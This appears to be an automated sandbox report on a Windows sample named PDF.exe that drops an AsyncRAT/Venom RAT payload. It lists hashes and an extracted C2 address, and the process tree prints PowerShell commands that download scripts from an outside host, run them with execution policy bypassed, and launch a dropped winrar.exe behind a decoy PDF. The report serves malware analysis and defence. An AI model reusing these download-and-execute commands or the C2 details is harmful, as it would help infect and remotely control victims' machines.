Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
21/01/2025, 13:31
250121-qspexswjes 1021/01/2025, 12:04
250121-n8tngasrhm 1013/07/2024, 12:59
240713-p8a2ss1gpq 10Analysis
-
max time kernel
142s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
13/07/2024, 12:59
Static task
static1
Behavioral task
behavioral1
Sample
PDF.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
PDF.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
PDF.exe
Resource
win10v2004-20240709-en
General
-
Target
PDF.exe
-
Size
258KB
-
MD5
34c2047d0b69ba023b700c21431accc0
-
SHA1
e34c28611707c81565cb73d8a1a46dfc3ab2495a
-
SHA256
ff9b39d07fd6e4a7f98d109664d91de9e318671da6412da85396541722d92799
-
SHA512
a1566d65beb8135edfcb5c4a09631bc17dff56db672621990a10d0eff37a0290c7e1e9705f1918a7e719cbea4b1cecc29bb8254da946108e9bd5432070cc8ca7
-
SSDEEP
6144:VbJhs7QW69hd1MMdxPe9N9uA0hu9TBrjJ0Xxne0AqGLj:VbjDhu9TV6xeJqG3
Malware Config
Extracted
http://thelustfactory.com/vns/1.ps1
Extracted
http://thelustfactory.com/vns/2.ps1
Extracted
http://thelustfactory.com/vns/winrar.exe
Extracted
asyncrat
Venom RAT + HVNC + Stealer + Grabber v6.0.3
Default
54.153.17.157:14445
rpujporiumcisxsdyop
-
delay
1
-
install
false
-
install_folder
%AppData%
Signatures
-
Async RAT payload 1 IoCs
resource yara_rule behavioral3/files/0x000b0000000234bd-61.dat family_asyncrat -
Blocklisted process makes network request 6 IoCs
flow pid Process 2 1460 powershell.exe 3 1460 powershell.exe 15 824 powershell.exe 16 824 powershell.exe 17 4660 powershell.exe 18 4660 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation PDF.exe Key value queried \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\Control Panel\International\Geo\Nation cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 4868 winrar.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
HTTP links in PDF interactive object 1 IoCs
Detects HTTP links in interactive objects within PDF files.
resource yara_rule behavioral3/files/0x00070000000234b9-73.dat pdf_with_link_action -
pid Process 1460 powershell.exe 824 powershell.exe 1528 powershell.exe 4660 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 3016 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings cmd.exe -
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid Process 1460 powershell.exe 1460 powershell.exe 824 powershell.exe 824 powershell.exe 1528 powershell.exe 1528 powershell.exe 4660 powershell.exe 4660 powershell.exe 4868 winrar.exe 4868 winrar.exe 4868 winrar.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 1460 powershell.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 4660 powershell.exe Token: SeDebugPrivilege 4868 winrar.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1004 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 4868 winrar.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe 1004 AcroRd32.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2180 wrote to memory of 2484 2180 PDF.exe 83 PID 2180 wrote to memory of 2484 2180 PDF.exe 83 PID 2484 wrote to memory of 1460 2484 cmd.exe 85 PID 2484 wrote to memory of 1460 2484 cmd.exe 85 PID 2484 wrote to memory of 824 2484 cmd.exe 89 PID 2484 wrote to memory of 824 2484 cmd.exe 89 PID 2484 wrote to memory of 1528 2484 cmd.exe 90 PID 2484 wrote to memory of 1528 2484 cmd.exe 90 PID 2484 wrote to memory of 4660 2484 cmd.exe 91 PID 2484 wrote to memory of 4660 2484 cmd.exe 91 PID 4660 wrote to memory of 4868 4660 powershell.exe 92 PID 4660 wrote to memory of 4868 4660 powershell.exe 92 PID 2484 wrote to memory of 3016 2484 cmd.exe 93 PID 2484 wrote to memory of 3016 2484 cmd.exe 93 PID 2484 wrote to memory of 1004 2484 cmd.exe 95 PID 2484 wrote to memory of 1004 2484 cmd.exe 95 PID 2484 wrote to memory of 1004 2484 cmd.exe 95 PID 1004 wrote to memory of 3468 1004 AcroRd32.exe 97 PID 1004 wrote to memory of 3468 1004 AcroRd32.exe 97 PID 1004 wrote to memory of 3468 1004 AcroRd32.exe 97 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 1668 3468 RdrCEF.exe 98 PID 3468 wrote to memory of 4412 3468 RdrCEF.exe 99 PID 3468 wrote to memory of 4412 3468 RdrCEF.exe 99 PID 3468 wrote to memory of 4412 3468 RdrCEF.exe 99
Processes
-
C:\Users\Admin\AppData\Local\Temp\PDF.exe"C:\Users\Admin\AppData\Local\Temp\PDF.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A623.tmp\A624.tmp\A625.bat C:\Users\Admin\AppData\Local\Temp\PDF.exe"2⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/1.ps1', 'C:\Users\Admin\AppData\Roaming\1.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1460
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('http://thelustfactory.com/vns/2.ps1', 'C:\Users\Admin\AppData\Roaming\2.ps1')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\1.ps13⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\2.ps13⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4660 -
C:\Users\Admin\AppData\Roaming\winrar.exe"C:\Users\Admin\AppData\Roaming\winrar.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4868
-
-
-
C:\Windows\system32\timeout.exetimeout /t 53⤵
- Delays execution with timeout.exe
PID:3016
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Roaming\pdf.pdf"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
PID:3468 -
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=BA7DAF37A179E794518CAB0BAAF74033 --mojo-platform-channel-handle=1764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1668
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=09DBA4191DD82DF3C82BF9F5155A4F8D --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=09DBA4191DD82DF3C82BF9F5155A4F8D --renderer-client-id=2 --mojo-platform-channel-handle=1780 --allow-no-sandbox-job /prefetch:15⤵PID:4412
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=D77BCCBB119B6F23D6B1333B2108D2AD --mojo-platform-channel-handle=2352 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:2192
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=113903818320E84399120EE673402C91 --mojo-platform-channel-handle=2008 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:3936
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=BCA41D9CC19A6B2E7D7EEE845751DB02 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=BCA41D9CC19A6B2E7D7EEE845751DB02 --renderer-client-id=6 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:15⤵PID:3956
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=8C9B5FB03B07F0E72639DAA4B2EFF9D6 --mojo-platform-channel-handle=2776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵PID:1828
-
-
-
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:408
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD544c070cddc34d9d301f02e051f3ef3ec
SHA1df1a5ef6f86daf28bb4563f965854c1251f4005a
SHA2562c4b70cc80ebbf99535cea290576d67f266eb16f26a9c9cde59ee88c8f03b548
SHA51224e48cdb8c4967de6ac93a6fccdf4de4360ac76c6072106b9c72ed9ea19cbaa750f05c88f14abfdf7aa08981f4d967d432a9431ba4caa85c437a8232079982ac
-
Filesize
2KB
MD52f57fde6b33e89a63cf0dfdd6e60a351
SHA1445bf1b07223a04f8a159581a3d37d630273010f
SHA2563b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA51242857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220
-
Filesize
1KB
MD5a5c074e56305e761d7cbc42993300e1c
SHA139b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8
-
Filesize
1KB
MD59843d1de2b283224f4f4b8730ccc919f
SHA1c053080262aef325e616687bf07993920503b62b
SHA256409d2853e27efaa5b7e5459a0c29103197e9d661338996a13d61ca225b2222d1
SHA51213d5809d2078ecd74aec818b510a900a9071605863b0a10037b3a203b76ea17598436ca5049cd13cf3442352670b21d386e84a88bece36e3440d408f123475de
-
Filesize
944B
MD54cb59d549e8c5d613ea4b7524088528a
SHA15bdfb9bc4920177a9e5d4b9c93df65383353ab22
SHA256a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a
SHA512a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52
-
Filesize
712B
MD50e9ce5162ba7661c863a835f9d34d907
SHA10b351312ab57a02857753cab2287da680955f40d
SHA256b67f37e765a5be87d9591efdb0501f0c97aa342ad1e4c34a711828c4a505c81e
SHA5128d7c0a3cc95628cbec8a215f365c3ed86746e7b350c811ace5ea4419031adbdbe75dc7d1350d9c71db51f5cbb972db4e33b1d05e9a3e2a109c559eb065811ec0
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
292B
MD5c45d77f74bf20916eea08e12286d999c
SHA109db885179d853b5a3c1a55acc7cb805d579a2a2
SHA2563fe1c7a75ff9897ee9d4489221e4b6f15632104a8b044bfd77b61d530ba6959b
SHA51229fe904f21d59900b3191554b54da236a2213f1e33a424931346b772bb15a28bf1dec7bcd5641e2637da0cf358ad8fc492ed6dff133f3d53600dc27e1c5d5fd4
-
Filesize
276B
MD5d7ca2ab9bdffd0dc3f8027df9412cbb0
SHA16928881786e0090321783f1bb9d77816336522a5
SHA256f029b124f899b34b0229f1a74a7e46b51b9853c73399a9eb922a13459c79b027
SHA512959c9c4881692eec74e9cca401acad934c16026a0e9102d0abb54ce85703bfae3023abfb68ee70a3ced032aeb124a976efa7fbd0818be61333f0b568f8ccf12e
-
Filesize
139KB
MD55afaf79789a776d81ec91ccbdc9fdaba
SHA16703901978dcb3dbf2d9915e1d3e066cfe712b0a
SHA25638c9792d725c45dd431699e6a3b0f0f8e17c63c9ac7331387ee30dcc6e42a511
SHA51209253eb87d097bdaa39f98cbbea3e6d83ee4641bca76c32c7eb1add17e9cb3117adb412d2e04ab251cca1fb19afa8b631d1e774b5dc8ae727f753fe2ffb5f288
-
Filesize
78KB
MD59e75fe5e60c15dd6b76e075516968cc3
SHA1fdb181a276c5d02ebc87fe302a4a61feddbeab59
SHA25658cd06e6011f7ce13d7ea4f7a2476c1bae3d3250b704d34030dc11818b7f403a
SHA51268b32885cc715ba8f8c0d3deda2174ebc6f02bc7113bd61ad6b8ef9b8349bf5290882a674ad5322b3a512b409d128e4d5e3a909d4311434d932296579c832cba